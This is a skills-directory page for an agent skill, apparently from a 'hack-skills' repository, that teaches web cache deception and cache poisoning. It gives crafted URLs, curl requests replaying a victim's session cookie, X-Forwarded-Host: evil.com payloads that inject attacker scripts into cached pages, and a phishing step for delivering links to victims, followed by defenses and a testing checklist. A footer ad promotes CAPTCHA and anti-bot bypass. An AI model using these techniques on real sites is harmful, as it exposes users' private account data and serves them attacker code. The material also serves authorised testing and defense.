DiscordSign up
SKILLS.SH

web-cache-deception

>-

INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill web-cache-deception
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

$27

The attacker tricks a victim into requesting their authenticated page at a URL that the cache considers static:

Victim visits: https://target.com/account/profile/nonexistent.css

→ Application ignores "nonexistent.css", serves /account/profile (with auth data)

→ CDN sees .css extension → caches the response

→ Attacker fetches: https://target.com/account/profile/nonexistent.css

→ CDN serves cached authenticated content → attacker reads victim's data

Web Cache Poisoning (serve malicious content)

The attacker manipulates unkeyed request components (headers, cookies) to make the cache store a malicious response:

GET /page HTTP/1.1

Host: target.com

X-Forwarded-Host: evil.com

→ Application generates: <script src="https://evil.com/js/app.js">

→ Cache stores this response

→ Normal users hit cache → load attacker's JavaScript

2. CACHE DECEPTION — ATTACK METHODOLOGY

Step 1: Identify Cacheable Path Patterns

CDNs typically cache by file extension:

.css  .js  .jpg  .png  .gif  .svg  .ico

.woff .woff2  .ttf  .pdf  .json (sometimes)

Step 2: Test Path Confusion

# Append static extension to authenticated endpoint:

https://target.com/api/me/info.css

https://target.com/account/profile/x.js

https://target.com/settings/avatar.png

https://target.com/dashboard/data.json

# Path traversal style:

https://target.com/account/profile/..%2fstatic/app.css

Step 3: Verify Caching

# Request as victim (authenticated):

curl -H "Cookie: session=VICTIM" https://target.com/account/profile/x.css

# Check response headers:

# X-Cache: MISS (first request)

# Age: 0

# Request again as attacker (no auth):

curl https://target.com/account/profile/x.css

# Check response:

# X-Cache: HIT

# Contains victim's authenticated content? → vulnerable

Step 4: Deliver to Victim

Send the crafted URL to victim via phishing, message, or embed:

https://target.com/account/profile/tracking.gif

3. CACHE POISONING — ATTACK METHODOLOGY

Unkeyed Input Discovery

Cache keys typically include: Host, URL path, query string.

These are typically NOT in the cache key: X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL, cookies, custom headers.

# Test if X-Forwarded-Host is reflected but not keyed:

curl -H "X-Forwarded-Host: evil.com" https://target.com/page

# If response contains evil.com and caches → poisonable

Common Unkeyed Headers

X-Forwarded-Host      X-Forwarded-Scheme    X-Forwarded-Proto

X-Original-URL        X-Rewrite-URL         X-Host

X-Forwarded-Server    Forwarded             True-Client-IP

Cache Poisoning via Host Header

GET / HTTP/1.1

Host: target.com

X-Forwarded-Host: evil.com

→ Response: <link href="//evil.com/static/main.css">

→ Cached → all users load attacker's CSS/JS

4. PATH NORMALIZATION DIFFERENCES

The key to cache deception: CDN and application normalize paths differently.

Component

Behavior

CDN (Cloudflare, Akamai)

Caches based on full URL path including extension

Application (Rails, Django, Express)

May ignore trailing path segments or extensions

Reverse proxy (Nginx)

May strip or rewrite path before forwarding

# Application treats these as equivalent:

/account/profile

/account/profile/anything

/account/profile/x.css

/account/profile;.css

# CDN treats .css as cacheable static asset

→ Mismatch = vulnerability

5. CACHE POISONING REAL-WORLD PATTERN

X-Forwarded-Host → Open Graph / Meta Tag Injection

# Target page uses X-Forwarded-Host to generate meta tags:

GET / HTTP/1.1

Host: target.com

X-Forwarded-Host: evil.com

# Response:

<meta property="og:image" content="https://evil.com/assets/logo.png">

# or:

<link rel="canonical" href="https://evil.com/">

# If response is cached → all users see evil.com references

# Impact: XSS via injected JS path, phishing via canonical redirect, SEO hijack

Cache Deception with Path Separator Tricks

# Semicolon (treated as path parameter by some frameworks):

/account/profile;.css

# Encoded separators:

/account/profile%2F.css

# Trailing dot/space:

/account/profile/.css

/account/profile .css

6. DEFENSE

For Cache Deception

  • Cache only explicitly static paths (e.g., /static/*, /assets/*)
  • Never cache based on file extension alone
  • Set Cache-Control: no-store, private on authenticated endpoints
  • Use Vary: Cookie to prevent cross-user cache hits

For Cache Poisoning

  • Include all reflected headers in cache key
  • Validate and sanitize X-Forwarded-* headers
  • Use Cache-Control: no-cache for dynamic content
  • Strip unknown headers at CDN edge

6. TESTING CHECKLIST

□ Identify CDN/cache layer (X-Cache, Age, Via headers)

□ Append .css/.js/.png to authenticated API endpoints

□ Check if response is cached (X-Cache: HIT on second request)

□ Test path separators: /x.css, ;.css, %2F.css

□ Test unkeyed headers: X-Forwarded-Host, X-Original-URL

□ Verify Cache-Control headers on sensitive endpoints

□ Check Vary header presence

□ Test with and without authentication
BrowserAct

Let your agent run on any real-world website

Bypass CAPTCHA & anti-bot for free. Start local, scale to cloud.

Explore BrowserAct Skills →

Related skills

azure-compliance
3/3

Azure compliance scanning, Key Vault expiration auditing, and resource configuration validation. Runs azqr (Azure Quick Review) for comprehensive compliance assessment against best practices across subscriptions and resource groups Monitors Key Vault keys, secrets, and certificates for expiration dates and identifies items without expiration policies Detects orphaned, misconfigured, and non-compliant resources using Resource Graph queries Classifies findings by priority (Critical, High, Medium, Low) with remediation guidance for each issue

Verified authormicrosoft
SKILLS.SH
293K1.1K
2026-05-22
openclaw-secure-linux-cloud
1/3

Use when self-hosting OpenClaw on a cloud server, hardening a remote OpenClaw gateway, choosing between SSH tunneling, Tailscale, or reverse-proxy exposure, or…

xixu-me
SKILLS.SH
150K53
2026-05-22
entra-agent-id
3/3

Provision Microsoft Entra Agent Identity Blueprints, BlueprintPrincipals, and per-instance Agent Identities via Microsoft Graph, and configure OAuth 2.0 token…

Verified authormicrosoft
SKILLS.SH
59.1K1.1K
2026-05-21
firebase-security-rules-auditor
3/3

A skill to evaluate how secure Firestore security rules are. Use this when Firestore security rules are updated to ensure that the generated rules are…

firebase
SKILLS.SH
23.5K292
2026-05-21

Stop writing automation&scrapers

Install the CLI. Run your first Skill in 30 seconds. Scale when you're ready.

Start free
free · no credit card